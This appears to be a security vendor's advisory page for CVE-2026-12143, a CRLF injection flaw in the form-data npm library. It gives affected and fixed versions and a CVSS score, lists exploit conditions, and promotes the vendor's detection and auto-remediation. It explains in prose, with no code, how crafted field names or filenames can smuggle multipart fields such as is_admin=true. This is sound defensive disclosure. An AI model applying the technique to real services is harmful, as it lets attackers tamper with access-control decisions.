CVE-2026-12143: form-data does not escape CR/LF/quote in multipart field names and filenames (CRLF injection)
form-data is a library for creating readable multipart/form-data streams. In versions through 4.0.5, the `field` argument to `FormData#append` and the `filename` option are concatenated verbatim into the `Content-Disposition` header without escaping carriage return (CR), line feed (LF), or double-quote (") characters. An application that passes attacker-controlled data as a field name or filename (for example, an API gateway that turns JSON object keys into multipart field names) allows the attacker to terminate the header line and inject additional headers, or to smuggle entire additional multipart parts, into the request the application forwards to a backend. This can let the attacker add or override form fields (e.g. set `is_admin=true`) seen by the downstream parser. This is an instance of CWE-93 (CRLF injection). The fix escapes CR, LF, and `"` as `%0D`, `%0A`, and `%22` in field names and filenames, matching the serialization browsers use per the WHATWG HTML multipart/form-data encoding algorithm. Exploitation requires the consuming application to use untrusted input as a field name or filename; applications that use only fixed/trusted field names are not affected. Fixed in 2.5.6, 3.0.5, and 4.0.6.
Metrics
- CVSS v4.0
- 8.7
- Severity
- HIGH
- Fixed in
- 2.5.6
- Affected Products
- 1
HarborGuard Analysis
Synopsis
CRLF injection in the form-data npm library affects versions through 4.0.5 across the 2.x, 3.x, and 4.x release lines. The vulnerability is reachable over the network with no authentication required; an attacker supplies malicious input as a multipart field name or filename containing unescaped CR, LF, or double-quote characters. Successful exploitation lets the attacker inject arbitrary headers or smuggle additional multipart parts into forwarded requests, allowing them to add or override form fields such as privilege flags seen by a downstream server. Patched-image rebuilds at versions 2.5.6, 3.0.5, and 4.0.6 are available on HarborGuard for environments running an affected version.
HarborGuard Coverage
Detection of CVE-2026-12143 is available across every HarborGuard environment; the CVE is ingested from upstream advisory feeds within minutes of publication and matched against all customer images, including custom-built images that bundle form-data as a transitive dependency. Any image whose dependency graph includes an affected form-data version is flagged immediately.
AvailableHarborGuard scores this finding at CVSS 8.7 (HIGH) using the published v4.0 vector and weights it further against each environment's compliance policy to determine routing priority. Triage tickets are routed to the appropriate team inbox within each customer organization based on image ownership and policy configuration.
AvailableA patched-image rebuild pinned to form-data 2.5.6, 3.0.5, or 4.0.6 (matching the affected release line) becomes available through HarborGuard the moment the fix versions are resolvable in the dependency graph. For customers who opt into auto-remediation, HarborGuard runs a rebuild, executes the regression test suite, and opens a pull request against each affected workload automatically.
AvailableExploit Conditions
- Network reachabilityRequired
The attacker must reach the application over the network and supply input that the application passes as a multipart field name or filename.
- AuthenticationNot required
No authentication is required; the attacker submits input through any unauthenticated interface that accepts field names or filenames.
- Victim interactionNot required
No victim interaction is needed; the attacker directly sends the crafted input to the target application.
- Attack complexityDetail
Attack complexity is low; the exploit is reliable and requires no race conditions, special memory layout, or other environmental preconditions beyond an application that passes attacker-controlled values as field names or filenames.
Blast Radius
- The attacker injects arbitrary Content-Disposition header content, effectively overriding or appending multipart form fields seen by the downstream parser.
- The attacker can smuggle entire additional multipart parts into the forwarded request, setting fields such as is_admin=true or overriding access-control parameters.
- Integrity of the downstream application's form-data processing is compromised; persisted records or access-control decisions based on those fields may be altered.
- Confidentiality and availability are not directly impacted by this vulnerability according to the CVSS vector.
How HarborGuard Handles This
Available on HarborGuard: detection is active for any image that resolves form-data below 2.5.6 (2.x), 3.0.5 (3.x), or 4.0.6 (4.x). For customers who opt into auto-remediation, HarborGuard rebuilds the image at the appropriate fix version, runs a regression test suite, and opens a pull request against affected workloads; for HIGH-severity issues, the median time from CVE publication to merged patch PR is around 90 minutes in environments with auto-remediation enabled. Where compliance policy requires manual review, the finding is routed to the designated team inbox with CVSS scoring and affected image inventory attached. Note that the vulnerability is only exploitable when the consuming application passes attacker-controlled data as a field name or filename; teams that use only fixed, trusted field names may treat this as lower priority, but upgrading is still the recommended remediation.
- form-data / form-data< 2.5.6 (from 0) · < 3.0.5 (from 3.0.0) · < 4.0.6 (from 4.0.0)
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N